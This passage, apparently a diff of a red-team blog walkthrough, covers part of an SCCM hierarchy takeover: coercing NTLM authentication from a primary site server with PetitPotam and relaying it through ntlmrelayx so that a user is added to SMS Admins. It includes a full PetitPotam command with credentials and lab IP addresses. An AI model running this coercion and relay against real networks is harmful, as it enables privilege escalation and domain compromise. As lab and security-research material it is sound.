Hierarchy Takeover via NTLM Coercion and Relay to MSSQL

 Finally, we need something to coerce the Primary Site Server into authenticating back to us.

 I won’t be trying to reinvent the wheel here, so I will be simply using PetitPotam which is using the EfsRpcOpenFileRaw RPC Procedure under the hood.
 I will be using the original one and not the fork by ly4k.
 Note that you could also use Coercer or something like SpoolSample.
 It really boils down to the target.
-Is the target behind a few KBs?
+Is the target lagging behind by a few KBs?
 Does the target run the Spooler Service?
 You get the picture.
 Enumerate first — then pick accordingly.

 python PetitPotam.py -d ludus.domain -u sccm_naa -p Password123 10.2.10.16 10.2.10.15

-After you ran PetitPotam, you can circle back to ntlmrelayx and, if everything went according to plan, you should have captured the authentication attempt and relayed it back to the target:
+After you ran PetitPotam, you can circle back to ntlmrelayx and, if everything went according to plan, you should have captured the authentication attempt and relayed it back to the target.

 At this point, the user sccm_naa has been added to the SMS Admins group onto the Primary Site Provider.
 You can confirm by using sccmhunter: